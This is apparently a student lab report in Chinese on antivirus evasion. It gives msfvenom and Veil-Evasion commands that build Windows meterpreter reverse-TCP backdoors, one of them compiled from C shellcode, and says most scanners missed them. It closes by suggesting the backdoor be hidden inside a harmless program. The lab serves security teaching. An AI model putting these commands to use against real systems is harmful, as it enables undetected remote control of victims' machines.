20145228《網絡對抗技術》免殺原理與實踐

實驗內容

•理解免殺技術原理

•正確使用msf編碼器，veil-evasion，本身利用shellcode編程等免殺工具或技巧

基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

1*惡意代碼通常具備明顯的特徵碼，依據特徵碼來判斷是不是惡意代碼

2*若是一個程序的行爲是帶有惡意的行爲，也會被檢測爲惡意代碼

（2）免殺是作什麼？

免殺就是避免殺軟的查殺與檢測

（3）免殺的基本方法有哪些？

•改變特徵碼

•儘可能避免殺軟檢測到帶有惡意的行爲，如使用反彈式鏈接

實驗過程

實驗過程當中使用的是virscan來進行在線查毒，很是方便

msfvenom直接生成meterpreter可執行文件

·按照前一次實驗的操做，用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.184.128 LPORT=5228 -f exe > 20145228.exe來生成一個後門程序

·而後利用ncat指令傳送到主機

·最後檢測結果：

基本均可以發現這是個惡意代碼

使用Veil-Evasion生成可執行文件

·Veil-Evasion是一個與Metasploit有點相似的軟件，已經在kali虛擬機裏，若是沒有能夠進行在線安裝

·直接輸入veil-evasion打開

·而後依次鍵入如下指令：

use python/meterpreter/rev_tcp //設置payload

set LHOST 192.168.88.144 //設置反彈鏈接IP

set LPORT 5228 //設置反彈端口5228，默認爲4444

generate //生成

145213 //程序名

以結果圖可知，該可執行文件存在kali計算機的/var/lib/veil-evasion/output/compiled/文件夾裏。

檢測結果：

此次基本沒幾個能檢測出來了

使用C語言調用Shellcode

•使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.3 LPORT=5228 -f c命令生成一個C語言shellcode數組

•而後將這段數組在VC上進行編寫shellcode

•在Kali下使用msf監聽，運行剛剛編譯生成的可執行文件，成功獲取權限。

最後再去檢測

附上個人殺軟版本：

實驗體會

清楚地瞭解了殺毒軟件查殺的原理，如何使得本身的惡意代碼免殺、惡意代碼的假裝。一款殺軟的檢測並不能表明最後的結果

離實戰還缺些什麼技術或步驟

最重要的是後門的假裝，較好的方法是隱藏到一些非惡意程序裏再進入目標主機